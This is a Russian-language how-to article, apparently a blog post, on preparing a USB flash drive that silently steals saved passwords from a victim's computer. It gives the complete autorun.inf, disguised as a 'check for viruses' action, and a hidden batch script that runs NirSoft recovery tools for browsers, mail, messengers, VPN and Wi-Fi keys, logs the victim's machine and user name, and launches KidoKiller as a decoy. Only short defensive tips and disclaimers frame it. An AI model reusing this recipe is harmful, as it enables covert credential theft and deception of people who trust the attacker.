Данная статья написана исключительно в ознакомительных целях.
Ее назначение - защита ваших данных от злоумышленника.
Кто осведомлен, тот вооружен!
Кража чужих паролей влечет за собой уголовную ответственность по ч. 1 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации», и грозит реальным тюремным сроком!Попробуем разобраться, как можно украсть пароли с компьютера, если у вас есть доступ к нему, но так чтобы жертва ничего не заподозрила.
Один из способов – создать специальную флэшку с утилитами, которые смогут вытащить пароли из браузеров и других программ, сохраняющих пароли для удобства пользователя.
Скачаем Password Recovery утилиты, которые нам потребуются:
* MessenPass — восстанавливает пароли к большинству популярных программ для обмена мгновенными сообщениями: MSN Messenger, Windows Messenger (In Windows XP), Windows Live Messenger (In Windows XP And Vista), Yahoo Messenger (Version 5.x/6.x), ICQ Lite 4.x/5.x/2003, AOL Instant Messenger, AIM 6.x, AIM Pro, Trillian, Miranda, and GAIM;
* Mail PassView — извлекает сохраненные пароли из почтовых клиентов: Outlook Express, Microsoft Outlook 2000 (POP3/SMTP Accounts only), Microsoft Outlook 2002/2003/2007, Windows Mail, IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free, and Web-based email accounts;
* IE Passview — отображает логины и пароли, сохраненные "осликом";
* ChromePass — отображает логины и пароли, сохраненные браузером Google Chrom;
* PasswordFox — получает все пароли, сохраненные Firefox'oм;
* Protected Storage PassView — восстанавливает все пароли, сохраненные в защищенном хранилище;
* Dialupass — вытаскивает все пароли dialup/VPN сессий;
* Network Password Recovery — отображает пароли которые вы используете для шар в локальной сети а так же пароли .NET Passport/Messenger account;
* PstPassword — извлекает пароли из файлов личных папок Outlook - .PST;
* WirelessKeyView — восстанавливает все ключи беспроводных сетей (WEP/WPA), которые хранятся на вашем компьютере.
Еще существует утилитка OperaPassView, но она пока не поддерживает командную строку. Поэтому ее не включаем в наш набор.
Все утилиты можно взять
тут.
Еще нам необходима утилитка Hidden Start (
hstart).
Так же скачаем
KidoKiller для того чтобы замаскировать наши утилиты. Его мы будем запускать в конце операции "тырения" паролей. И только его работу будет видеть жертва на своем экране.
Подготавливаем флэшку.1. Создаем на флэшке две папки:
флэшка:\prog\
флэшка:\prog\log\
2. В папку флэшка:\prog\ заливаем все экзешники – утилиты, hstart.exe, KK.exe
3. В корне флешки создаем autorun.inf со следующим содержанием:
[autorun]
open=prog/hstart /NOCONSOLE "launch.bat"
ACTION= Проверить комп на вирусы
Здесь action – кнопка, которая будет отображаться в окне выбора действий при подключении флэшки, а open – команда, которую нужно выполнить при выборе этого действия. Эта команда включает в себя запуск бат-ника в скрытом режиме с помощью утилиты Hidden Start.
4. Создаем батник launch.bat:
echo off
echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt
start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt
start prog/Dialupass.exe /stext prog/log/%computername%_dialupass.txt
start prog/iepv.exe /stext prog/log/%computername%_iepv.txt
start prog/mailpv.exe /stext prog/log/%computername%_mailpv.txt
start prog/mspass.exe /stext prog/log/%computername%_mspass.txt
start prog/netpass.exe /stext prog/log/%computername%_netpass.txt
start prog/pspv.exe /stext prog/log/%computername%_pspv.txt
start prog/PstPassword.exe /stext prog/log/%computername%_pstpassword.txt
start prog/WirelessKeyView.exe /stext prog/log/%computername%_wirelesskeyview.txt
If Not Exist "%programfiles%\Mozilla Firefox\" GoTo End
start prog/PasswordFox.exe /stext prog/log/%computername%_passwordfox.txt
:End
start prog/KK.exe
Рассмотрим команды батника поподробнее:
echo off – запрет на вывод в окно CMD результатов выполнения
echo %computername%\%username% Ъte% %time% >> prog/log/_log.txt – в файл prog/log/_log.txt записать имя компьютера, имя пользователя, дату и время
start prog/ChromePass.exe /stext prog/log/%computername%_chrom.txt – запустить утилиту ChromePass.exe которая по выполнению должна сохранить пароли в файл prog/log/имя_компьютера_chrom.txt
Аналогично и для остальных утилит. Единственное замечание – перед запуском PasswordFox.exe проверим, что FF вообще установлен на компьютере жертвы. Просто если ФФ не установлен, то утилита PasswordFox.exe выдает сообщение с ошибкой.
start prog/KK.exe – маскируем свои действия запуском настоящей утилиты для удаления червя Net-Worm.Win32.Kido от Лаборатории Касперского
Все – флэшка готова. Теперь злоумышленнику достаточно просто подключить флэшку к компьютеру жертвы и в появившемся рорир-окне выбрать "Проверить комп на вирусы", чтобы вытащить все сохраненные пароли на этом компьютере. Обоснование необходимости запуска "проверки на вирусы" достаточно просто, особенно если жертва вам доверяет.
Как же бороться?1. Не сохраняйте пароли – лучше пользоваться какой-нибудь программкой типа Password Keeper или eWallet.
2. Отключить авторан для флэшек и следить, чтобы ваши посетители не запускали никаких "очень важных" утилит с флэшки.
3. Наличие нормального антивируса обязательно! Хотя он и ругнется только на несколько этих утилит.
Поводом для написания этой статьи стала заметка в журнале "Хакер".
Данная статья написана исключительно в ознакомительных целях.
Ее назначение - защита ваших данных от злоумышленника.
Кто осведомлен, тот вооружен!
Кража чужих паролей влечет за собой уголовную ответственность по ч. 1 ст. 272 УК РФ «Неправомерный доступ к компьютерной информации», и грозит реальным тюремным сроком!